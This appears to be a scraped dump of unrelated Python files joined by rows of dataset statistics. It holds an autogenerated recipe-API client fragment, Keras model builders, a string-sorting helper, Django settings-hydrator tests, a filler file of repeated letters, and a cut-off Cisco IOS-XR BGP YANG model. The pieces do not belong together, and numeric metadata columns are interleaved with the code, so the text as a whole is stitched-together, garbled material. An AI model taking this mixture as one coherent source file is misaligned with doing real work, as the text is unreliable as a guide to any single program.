all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method visualize_recipe_taste" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'ingredient_list' is set
if ('ingredient_list' not in local_var_params or
local_var_params['ingredient_list'] is None):
raise ApiValueError("Missing the required parameter `ingredient_list` when calling `visualize_recipe_taste`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'ingredient_list' in local_var_params:
form_params.append(('ingredientList', local_var_params['ingredient_list'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/html']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/visualizeTaste', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def visualize_recipe_taste_by_id(self, id, **kwargs): # noqa: E501
"""Visualize Recipe Taste by ID # noqa: E501
Get a recipe's taste. The tastes supported are sweet, salty, sour, bitter, savory, and fatty. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_recipe_taste_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.visualize_recipe_taste_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.visualize_recipe_taste_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def visualize_recipe_taste_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Visualize Recipe Taste by ID # noqa: E501
Get a recipe's taste. The tastes supported are sweet, salty, sour, bitter, savory, and fatty. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_recipe_taste_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method visualize_recipe_taste_by_id" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `visualize_recipe_taste_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/html']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/{id}/tasteWidget', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 48.680357
| 1,558
| 0.645488
| 55,725
| 446,837
| 4.922566
| 0.01624
| 0.052758
| 0.084109
| 0.029397
| 0.979953
| 0.974237
| 0.971135
| 0.964886
| 0.957825
| 0.94901
| 0
| 0.016897
| 0.270213
| 446,837
| 9,178
| 1,559
| 48.685661
| 0.824297
| 0.384433
| 0
| 0.819563
| 0
| 0
| 0.200527
| 0.043827
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032604
| false
| 0
| 0.001013
| 0
| 0.082422
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
402ae7b9d23540c4df39e1edae05bc76b92dd4bf
| 41
|
py
|
Python
|
src/universal_api/__init__.py
|
VolodymyrVozniak/universal-api
|
2566f55dc50d50f9833c4c6ef2617cc9378a2a9f
|
[
"MIT"
] | null | null | null |
src/universal_api/__init__.py
|
VolodymyrVozniak/universal-api
|
2566f55dc50d50f9833c4c6ef2617cc9378a2a9f
|
[
"MIT"
] | null | null | null |
src/universal_api/__init__.py
|
VolodymyrVozniak/universal-api
|
2566f55dc50d50f9833c4c6ef2617cc9378a2a9f
|
[
"MIT"
] | null | null | null |
from universal_api.universal_api import *
| 41
| 41
| 0.878049
| 6
| 41
| 5.666667
| 0.666667
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073171
| 41
| 1
| 41
| 41
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4088fac56d395800a7a7b45c16abcab993a6746c
| 3,469
|
py
|
Python
|
airl/policy/estimators.py
|
malkayo/AiRL
|
7db8c6c7fa8c93783a18d7180c3e24fb6792c10a
|
[
"BSD-3-Clause"
] | null | null | null |
airl/policy/estimators.py
|
malkayo/AiRL
|
7db8c6c7fa8c93783a18d7180c3e24fb6792c10a
|
[
"BSD-3-Clause"
] | null | null | null |
airl/policy/estimators.py
|
malkayo/AiRL
|
7db8c6c7fa8c93783a18d7180c3e24fb6792c10a
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python
def get_std_nn(policy, optim, w_init="zero", regularization=1E-3):
# Return an std_nn Keras model
from keras.models import Sequential
from keras.layers import Dense
from keras.regularizers import l2
from keras.layers.advanced_activations import LeakyReLU
input_shape = (policy.state_dimension,)
# Model Definition
model = Sequential()
model.add(Dense(128, activation='linear', input_shape=input_shape,
init=w_init, W_regularizer=l2(regularization)))
model.add(LeakyReLU(alpha=0.01))
model.add(Dense(128, activation='linear', init=w_init,
W_regularizer=l2(regularization)))
model.add(LeakyReLU(alpha=0.01))
model.add(Dense(128, activation='linear', init=w_init,
W_regularizer=l2(regularization)))
model.add(LeakyReLU(alpha=0.01))
model.add(Dense(len(policy.valid_actions), init=w_init,
W_regularizer=l2(regularization)))
# Compile model
model.compile(optimizer=optim, loss='mse')
return model, input_shape
def get_conv_nn(policy, optim, w_init="zero", regularization=1E-4):
# Return an conv_nn Keras model
from keras.models import Sequential
from keras.layers import Dense, Convolution2D, Flatten
from keras.layers.advanced_activations import LeakyReLU
input_shape = policy.state_dimension
print "Conv NN input {}".format(input_shape)
# Model Definition
model = Sequential()
model.add(Convolution2D(32, 6, 6, subsample=(3, 3), init=w_init,
activation='linear', border_mode='valid', input_shape=input_shape))
model.add(LeakyReLU(alpha=0.01))
model.add(Convolution2D(64, 4, 4, subsample=(2, 2), init=w_init,
activation='linear', border_mode='valid'))
model.add(LeakyReLU(alpha=0.01))
model.add(Convolution2D(64, 3, 3, subsample=(1, 1), init=w_init,
activation='linear', border_mode='valid'))
model.add(LeakyReLU(alpha=0.01))
model.add(Flatten())
model.add(Dense(512, init=w_init, activation="linear"))
model.add(LeakyReLU(alpha=0.01))
model.add(Dense(len(policy.valid_actions), init=w_init))
# Compile Model
model.compile(optimizer=optim, loss='mse')
return model, input_shape
def get_conv_nn_plus(policy, optim, w_init="zero", regularization=1E-4):
# Return an conv_nn Keras model
from keras.models import Sequential
from keras.layers import Dense, Convolution2D, Flatten
from keras.layers.advanced_activations import LeakyReLU
input_shape = policy.state_dimension
print "Conv NN input {}".format(input_shape)
# Model Definition
model = Sequential()
model.add(Convolution2D(64, 6, 6, subsample=(3, 3), init=w_init,
activation='linear', border_mode='valid', input_shape=input_shape))
model.add(LeakyReLU(alpha=0.01))
model.add(Convolution2D(128, 4, 4, subsample=(2, 2), init=w_init,
activation='linear', border_mode='valid'))
model.add(LeakyReLU(alpha=0.01))
model.add(Convolution2D(128, 3, 3, subsample=(1, 1), init=w_init,
activation='linear', border_mode='valid'))
model.add(LeakyReLU(alpha=0.01))
model.add(Flatten())
model.add(Dense(1024, init=w_init, activation="linear"))
model.add(LeakyReLU(alpha=0.01))
model.add(Dense(len(policy.valid_actions), init=w_init))
# Compile Model
model.compile(optimizer=optim, loss='mse')
return model, input_shape
| 36.515789
| 81
| 0.689536
| 472
| 3,469
| 4.940678
| 0.141949
| 0.092624
| 0.054031
| 0.103774
| 0.958405
| 0.958405
| 0.931818
| 0.919811
| 0.903516
| 0.903516
| 0
| 0.037311
| 0.181032
| 3,469
| 94
| 82
| 36.904255
| 0.783527
| 0.057077
| 0
| 0.734375
| 0
| 0
| 0.045692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.15625
| null | null | 0.03125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
409c28b48d82474c126683dd3387a73b0c9aacd2
| 194
|
py
|
Python
|
pystrings/lineup_students/__init__.py
|
JASTYN/pythonmaster
|
46638ab09d28b65ce5431cd0759fe6df272fb85d
|
[
"Apache-2.0",
"MIT"
] | 3
|
2017-05-02T10:28:13.000Z
|
2019-02-06T09:10:11.000Z
|
pystrings/lineup_students/__init__.py
|
JASTYN/pythonmaster
|
46638ab09d28b65ce5431cd0759fe6df272fb85d
|
[
"Apache-2.0",
"MIT"
] | 2
|
2017-06-21T20:39:14.000Z
|
2020-02-25T10:28:57.000Z
|
pystrings/lineup_students/__init__.py
|
JASTYN/pythonmaster
|
46638ab09d28b65ce5431cd0759fe6df272fb85d
|
[
"Apache-2.0",
"MIT"
] | 2
|
2016-07-29T04:35:22.000Z
|
2017-01-18T17:05:36.000Z
|
def lineup_students(string):
return sorted(string.split(), key=lambda x: (len(x), x), reverse=True)
# lineup_students = lambda s: sorted(s.split(), key=lambda x: (len(x), x), reverse=True)
| 38.8
| 88
| 0.685567
| 31
| 194
| 4.225806
| 0.451613
| 0.21374
| 0.21374
| 0.229008
| 0.473282
| 0.473282
| 0.473282
| 0.473282
| 0.473282
| 0
| 0
| 0
| 0.128866
| 194
| 4
| 89
| 48.5
| 0.775148
| 0.443299
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
40a9cf7f2a478c74c6e767c554c948cc9a9490a2
| 4,184
|
py
|
Python
|
misago/conf/tests/test_hydrators.py
|
HenryChenV/iJiangNan
|
68f156d264014939f0302222e16e3125119dd3e3
|
[
"MIT"
] | 1
|
2017-07-25T03:04:36.000Z
|
2017-07-25T03:04:36.000Z
|
misago/conf/tests/test_hydrators.py
|
HenryChenV/iJiangNan
|
68f156d264014939f0302222e16e3125119dd3e3
|
[
"MIT"
] | null | null | null |
misago/conf/tests/test_hydrators.py
|
HenryChenV/iJiangNan
|
68f156d264014939f0302222e16e3125119dd3e3
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from misago.conf.hydrators import dehydrate_value, hydrate_value
from misago.conf.models import Setting
class HydratorsTests(TestCase):
def test_hydrate_dehydrate_string(self):
"""string value is correctly hydrated and dehydrated"""
wet_value = 'Ni!'
dry_value = dehydrate_value('string', wet_value)
self.assertEqual(hydrate_value('string', dry_value), wet_value)
def test_hydrate_dehydrate_bool(self):
"""bool values are correctly hydrated and dehydrated"""
wet_value = True
dry_value = dehydrate_value('bool', wet_value)
self.assertEqual(hydrate_value('bool', dry_value), wet_value)
wet_value = False
dry_value = dehydrate_value('bool', wet_value)
self.assertEqual(hydrate_value('bool', dry_value), wet_value)
def test_hydrate_dehydrate_int(self):
"""int value is correctly hydrated and dehydrated"""
wet_value = 9001
dry_value = dehydrate_value('int', wet_value)
self.assertEqual(hydrate_value('int', dry_value), wet_value)
def test_hydrate_dehydrate_list(self):
"""list is correctly hydrated and dehydrated"""
wet_value = ['foxtrot', 'uniform', 'hotel']
dry_value = dehydrate_value('list', wet_value)
self.assertEqual(hydrate_value('list', dry_value), wet_value)
def test_hydrate_dehydrate_empty_list(self):
"""empty list is correctly hydrated and dehydrated"""
wet_value = []
dry_value = dehydrate_value('list', wet_value)
self.assertEqual(hydrate_value('list', dry_value), wet_value)
def test_value_error(self):
"""unsupported type raises ValueError"""
with self.assertRaises(ValueError):
hydrate_value('eric', None)
with self.assertRaises(ValueError):
dehydrate_value('eric', None)
class HydratorsModelTests(TestCase):
def test_hydrate_dehydrate_string(self):
"""string value is correctly hydrated and dehydrated in model"""
setting = Setting(python_type='string')
wet_value = 'Lorem Ipsum'
dry_value = dehydrate_value(setting.python_type, wet_value)
setting.value = wet_value
self.assertEqual(setting.value, wet_value)
self.assertEqual(setting.dry_value, dry_value)
def test_hydrate_dehydrate_bool(self):
"""bool values are correctly hydrated and dehydrated in model"""
setting = Setting(python_type='bool')
wet_value = True
dry_value = dehydrate_value(setting.python_type, wet_value)
setting.value = wet_value
self.assertEqual(setting.value, wet_value)
self.assertEqual(setting.dry_value, dry_value)
wet_value = False
dry_value = dehydrate_value(setting.python_type, wet_value)
setting.value = wet_value
self.assertEqual(setting.value, wet_value)
self.assertEqual(setting.dry_value, dry_value)
def test_hydrate_dehydrate_int(self):
"""int value is correctly hydrated and dehydrated in model"""
setting = Setting(python_type='int')
wet_value = 9001
dry_value = dehydrate_value(setting.python_type, wet_value)
setting.value = wet_value
self.assertEqual(setting.value, wet_value)
self.assertEqual(setting.dry_value, dry_value)
def test_hydrate_dehydrate_list(self):
"""list is correctly hydrated and dehydrated in model"""
setting = Setting(python_type='list')
wet_value = ['Lorem', 'Ipsum', 'Dolor', 'Met']
dry_value = dehydrate_value(setting.python_type, wet_value)
setting.value = wet_value
self.assertEqual(setting.value, wet_value)
self.assertEqual(setting.dry_value, dry_value)
def test_hydrate_dehydrate_empty_list(self):
"""empty list is correctly hydrated and dehydrated in model"""
setting = Setting(python_type='list')
wet_value = []
dry_value = dehydrate_value(setting.python_type, wet_value)
setting.value = wet_value
self.assertEqual(setting.value, wet_value)
self.assertEqual(setting.dry_value, dry_value)
| 37.026549
| 72
| 0.686185
| 508
| 4,184
| 5.377953
| 0.110236
| 0.122987
| 0.095168
| 0.151537
| 0.847731
| 0.847731
| 0.822108
| 0.799414
| 0.770132
| 0.770132
| 0
| 0.002449
| 0.219407
| 4,184
| 112
| 73
| 37.357143
| 0.834048
| 0.13217
| 0
| 0.739726
| 0
| 0
| 0.036364
| 0
| 0
| 0
| 0
| 0
| 0.273973
| 1
| 0.150685
| false
| 0
| 0.041096
| 0
| 0.219178
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
40abb3ad746369194537416d8bf7b773d4cf9a79
| 1,772
|
py
|
Python
|
test/integration/CommentDocTag/giant summary.py
|
HighSchoolHacking/GLS-Draft
|
9e418b6290e7c8e3f2da87668784bdba1cde5a76
|
[
"MIT"
] | 30
|
2019-10-29T12:47:50.000Z
|
2022-02-12T06:41:39.000Z
|
test/integration/CommentDocTag/giant summary.py
|
HighSchoolHacking/GLS-Draft
|
9e418b6290e7c8e3f2da87668784bdba1cde5a76
|
[
"MIT"
] | 247
|
2017-09-21T17:11:18.000Z
|
2019-10-08T12:59:07.000Z
|
test/integration/CommentDocTag/giant summary.py
|
HighSchoolHacking/GLS-Draft
|
9e418b6290e7c8e3f2da87668784bdba1cde5a76
|
[
"MIT"
] | 17
|
2017-10-01T16:53:20.000Z
|
2018-11-28T07:20:35.000Z
|
#
aaa bbb ccc ddd eee fff ggg hhh iii jjj kkk lll mmm nnn ooo ppp qqq
rrr sss ttt uuu vvv www xxx yyy zzz aaa bbb ccc ddd eee fff ggg hhh
iii jjj kkk lll mmm nnn ooo ppp qqq rrr sss ttt uuu vvv www xxx yyy
zzz aaa bbb ccc ddd eee fff ggg hhh iii jjj kkk lll mmm nnn ooo ppp
qqq rrr sss ttt uuu vvv www xxx yyy zzz aaa bbb ccc ddd eee fff ggg
hhh iii jjj kkk lll mmm nnn ooo ppp qqq rrr sss ttt uuu vvv www xxx
yyy zzz aaa bbb ccc ddd eee fff ggg hhh iii jjj kkk lll mmm nnn ooo
ppp qqq rrr sss ttt uuu vvv www xxx yyy zzz aaa bbb ccc ddd eee fff
ggg hhh iii jjj kkk lll mmm nnn ooo ppp qqq rrr sss ttt uuu vvv www
xxx yyy zzz aaa bbb ccc ddd eee fff ggg hhh iii jjj kkk lll mmm nnn
ooo ppp qqq rrr sss ttt uuu vvv www xxx yyy zzz aaa bbb ccc ddd eee
fff ggg hhh iii jjj kkk lll mmm nnn ooo ppp qqq rrr sss ttt uuu vvv
www xxx yyy zzz aaa bbb ccc ddd eee fff ggg hhh iii jjj kkk lll mmm
nnn ooo ppp qqq rrr sss ttt uuu vvv www xxx yyy zzz aaa bbb ccc ddd
eee fff ggg hhh iii jjj kkk lll mmm nnn ooo ppp qqq rrr sss ttt uuu
vvv www xxx yyy zzz aaa bbb ccc ddd eee fff ggg hhh iii jjj kkk lll
mmm nnn ooo ppp qqq rrr sss ttt uuu vvv www xxx yyy zzz aaa bbb ccc
ddd eee fff ggg hhh iii jjj kkk lll mmm nnn ooo ppp qqq rrr sss ttt
uuu vvv www xxx yyy zzz aaa bbb ccc ddd eee fff ggg hhh iii jjj kkk
lll mmm nnn ooo ppp qqq rrr sss ttt uuu vvv www xxx yyy zzz aaa bbb
ccc ddd eee fff ggg hhh iii jjj kkk lll mmm nnn ooo ppp qqq rrr sss
ttt uuu vvv www xxx yyy zzz aaa bbb ccc ddd eee fff ggg hhh iii jjj
kkk lll mmm nnn ooo ppp qqq rrr sss ttt uuu vvv www xxx yyy zzz aaa
bbb ccc ddd eee fff ggg hhh iii jjj kkk lll mmm nnn ooo ppp qqq rrr
sss ttt uuu vvv www xxx yyy zzz aaa bbb ccc ddd eee fff ggg hhh iii
jjj kkk lll mmm nnn ooo ppp qqq rrr sss ttt uuu vvv www xxx yyy zzz
#
| 61.103448
| 67
| 0.748307
| 442
| 1,772
| 3
| 0.058824
| 0.076923
| 0.115385
| 0.153846
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.250564
| 1,772
| 28
| 68
| 63.285714
| 0.998494
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
40bb224e2ca9696f3b12fee38d99b8fb0c64b840
| 740,635
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ipv4_bgp_oc_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 177
|
2016-03-15T17:03:51.000Z
|
2022-03-18T16:48:44.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ipv4_bgp_oc_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 18
|
2016-03-30T10:45:22.000Z
|
2020-07-14T16:28:13.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ipv4_bgp_oc_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 85
|
2016-03-16T20:38:57.000Z
|
2022-02-22T04:26:02.000Z
|
""" Cisco_IOS_XR_ipv4_bgp_oc_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR ipv4\-bgp\-oc package operational data.
This module contains definitions
for the following management objects\:
oc\-bgp\: OC\-BGP operational data
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class BgpOcAfi(Enum):
"""
BgpOcAfi (Enum Class)
BGP Address family
.. data:: ipv4 = 0
IPv4 unicast
.. data:: ipv6 = 5
IPv6 unicast
"""
ipv4 = Enum.YLeaf(0, "ipv4")
ipv6 = Enum.YLeaf(5, "ipv6")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['BgpOcAfi']
class BgpOcInvalidRouteReason(Enum):
"""
BgpOcInvalidRouteReason (Enum Class)
Invalid route reason
.. data:: valid_route = 1
Valid route
.. data:: invalid_clsuter_loop = 2
ClusterLoop
.. data:: invalid_as_path_loop = 3
AsPathLoop
.. data:: invalid_origin_at_or_id = 4
OriginatorID
.. data:: invalid_as_confed_loop = 5
ASConfedLoop
"""
valid_route = Enum.YLeaf(1, "valid-route")
invalid_clsuter_loop = Enum.YLeaf(2, "invalid-clsuter-loop")
invalid_as_path_loop = Enum.YLeaf(3, "invalid-as-path-loop")
invalid_origin_at_or_id = Enum.YLeaf(4, "invalid-origin-at-or-id")
invalid_as_confed_loop = Enum.YLeaf(5, "invalid-as-confed-loop")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['BgpOcInvalidRouteReason']
class BgpOcOriginAttr(Enum):
"""
BgpOcOriginAttr (Enum Class)
Origin Type
.. data:: igp = 0
IGP
.. data:: egp = 1
EGP
.. data:: incomplete = 2
Incomplete
"""
igp = Enum.YLeaf(0, "igp")
egp = Enum.YLeaf(1, "egp")
incomplete = Enum.YLeaf(2, "incomplete")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['BgpOcOriginAttr']
class OcBgp(_Entity_):
"""
OC\-BGP operational data
.. attribute:: bgp_rib
BGP\-RIB operational data
**type**\: :py:class:`BgpRib <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp, self).__init__()
self._top_entity = None
self.yang_name = "oc-bgp"
self.yang_parent_name = "Cisco-IOS-XR-ipv4-bgp-oc-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("bgp-rib", ("bgp_rib", OcBgp.BgpRib))])
self._leafs = OrderedDict()
self.bgp_rib = OcBgp.BgpRib()
self.bgp_rib.parent = self
self._children_name_map["bgp_rib"] = "bgp-rib"
self._segment_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp, [], name, value)
class BgpRib(_Entity_):
"""
BGP\-RIB operational data
.. attribute:: afi_safi_table
AFI\-SAFIs information
**type**\: :py:class:`AfiSafiTable <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib, self).__init__()
self.yang_name = "bgp-rib"
self.yang_parent_name = "oc-bgp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("afi-safi-table", ("afi_safi_table", OcBgp.BgpRib.AfiSafiTable))])
self._leafs = OrderedDict()
self.afi_safi_table = OcBgp.BgpRib.AfiSafiTable()
self.afi_safi_table.parent = self
self._children_name_map["afi_safi_table"] = "afi-safi-table"
self._segment_path = lambda: "bgp-rib"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib, [], name, value)
class AfiSafiTable(_Entity_):
"""
AFI\-SAFIs information
.. attribute:: ipv4_unicast
IPv4 Unicast
**type**\: :py:class:`Ipv4Unicast <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast>`
**config**\: False
.. attribute:: ipv6_unicast
IPv6 Unicast
**type**\: :py:class:`Ipv6Unicast <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable, self).__init__()
self.yang_name = "afi-safi-table"
self.yang_parent_name = "bgp-rib"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("ipv4-unicast", ("ipv4_unicast", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast)), ("ipv6-unicast", ("ipv6_unicast", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast))])
self._leafs = OrderedDict()
self.ipv4_unicast = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast()
self.ipv4_unicast.parent = self
self._children_name_map["ipv4_unicast"] = "ipv4-unicast"
self.ipv6_unicast = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast()
self.ipv6_unicast.parent = self
self._children_name_map["ipv6_unicast"] = "ipv6-unicast"
self._segment_path = lambda: "afi-safi-table"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable, [], name, value)
class Ipv4Unicast(_Entity_):
"""
IPv4 Unicast
.. attribute:: loc_rib
Local rib route table
**type**\: :py:class:`LocRib <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib>`
**config**\: False
.. attribute:: open_config_neighbors
Neighbor list
**type**\: :py:class:`OpenConfigNeighbors <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast, self).__init__()
self.yang_name = "ipv4-unicast"
self.yang_parent_name = "afi-safi-table"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("loc-rib", ("loc_rib", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib)), ("open-config-neighbors", ("open_config_neighbors", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors))])
self._leafs = OrderedDict()
